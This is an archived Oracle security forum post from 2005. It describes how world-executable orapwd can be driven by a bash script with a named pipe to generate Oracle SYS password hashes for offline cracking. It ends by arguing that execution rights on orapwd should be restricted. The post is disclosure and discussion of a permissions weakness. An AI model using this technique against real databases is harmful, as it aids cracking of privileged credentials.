Auditing an Oracle database for security issues is very important. PeteFinnigan.com provides all of the information and tools that you will need Click here for details of PeteFinnigan.com Limited's detailed Oracle database security audit service Click here for details of PeteFinnigan.com Limited's Oracle Security Training Courses
Cookie Policy:We only use essential cookies on small sections of this website. For details see here.

Welcome, Guest. Please Login.
Oct 17th, 2018, 11:24pm
News: Welcome to Pete Finnigan's Oracle security forum
Home | Help | Search | Members | Login
   Pete Finnigan's Oracle Security Forum
   Oracle Security
   Oracle Security tools
(Moderator: Pete Finnigan)
   orapwd to crack sys hash?
« Previous topic | Next topic »
Pages: 1  Reply | Notify of replies | Send Topic | Print
   Author  Topic: orapwd to crack sys hash?  (Read 5935 times)
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
orapwd to crack sys hash?
« on: Sep 20th, 2005, 1:51pm »
Quote | Modify

Hi,
 
I've being playing with orapwd. Orapwd is 'world' executable on a standard Oracle installation. It allows to change/set the SYS password. The password is stored in $ORACLE_HOME/dbs/orapw<SID>.
But any OS user can execute it and create his own password-file. If the password-file doesn't exists its created, if it exists you get an error: OPW-00005: File with same name exists. If you use the force=y option the password-file is recreated. How can you use orapwd to crack SYS's password? Well, if you happens to have the hash value of SYS's password (very unprobable I think) you could generate all posible hashes with orapwd (although probably not as fast as orabf; I did a test with 26 password, from A to Z, and it took 0.6 seconds):
 
#!/bin/bash
 
# Auteur: I.A. Saez Scheihing
 
mknod pijp p
 
while true; do cat < pijp  >> output.txt; done &
 
orapwd file=pijp password=a force=y
orapwd file=pijp password=b force=y
orapwd file=pijp password=c force=y
orapwd file=pijp password=d force=y
orapwd file=pijp password=e force=y
orapwd file=pijp password=f force=y
orapwd file=pijp password=g force=y
orapwd file=pijp password=h force=y
orapwd file=pijp password=j force=y
orapwd file=pijp password=k force=y
orapwd file=pijp password=l force=y
orapwd file=pijp password=m force=y
orapwd file=pijp password=n force=y
orapwd file=pijp password=o force=y
orapwd file=pijp password=p force=y
...
...
..
rm pijp
 
# end script
 
So after 'password=' you could try all password combinations. After completion you would find all posible hashes in file output.txt!
 
 
By the way:
I don't think every one should be allowd to execute orapwd. This tool is meant for oracle only.
 
kind regards,
 
Ivan
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pages: 1  Reply | Notify of replies | Send Topic | Print

« Previous topic | Next topic »

Powered by YaBB 1 Gold - SP 1.4!
Forum software copyright 2000-2004 Yet another Bulletin Board